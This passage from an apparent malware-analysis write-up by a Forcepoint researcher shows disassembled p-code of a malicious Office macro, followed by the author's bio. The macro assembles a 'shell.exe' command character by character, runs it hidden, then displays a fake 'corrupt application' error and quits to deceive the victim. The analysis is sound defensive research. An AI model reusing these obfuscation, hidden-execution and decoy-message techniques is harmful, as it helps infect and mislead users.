       Concat
       LitStr 0x0001 "s"
       Concat
       LitStr 0x0001 "h"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x0001 "."
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "x"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 " "
       Concat
       St hCiSSPdnGWigF
Line #15:
       Ld hCiSSPdnGWigF
       Ld omVsI
       Concat
       LitDI2 0x0000
       LitVarSpecial (False)
       Ld zomnqaCVeYJhMzN
       ArgsMemLd Run 0x0003
       St ifZKwUg
Line #16:
       Dim
       VarDefn title (As String)
Line #17:
       LitStr 0x0039 "Microsoft Office Corrupt Application (Compatibility Mode)"
       St title
Line #18:
       Dim
       VarDefn msg (As String)
Line #19:
       Dim
       VarDefn intResponse (As Integer)
Line #20:
       LitStr 0x00AE "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
       St msg
Line #21:
       Ld msg
       LitDI2 0x0010
       Ld title
       ArgsLd MsgBox 0x0003
       St intResponse
Line #22:
       Ld Application
       ArgsMemCall Quit 0x0000
Line #23:
       EndSub
Line

About the Author

Kurt Natvig

Principal Research Scientist

Kurt Natvig is a Principal Research Scientist in Forcepoint's Innovation Lab. The Innovation Lab focuses on reducing engineering risk by researching and implementing proofs of concept beyond the roadmap.

Kurt is also heavily involved in reverse engineering malware and performs...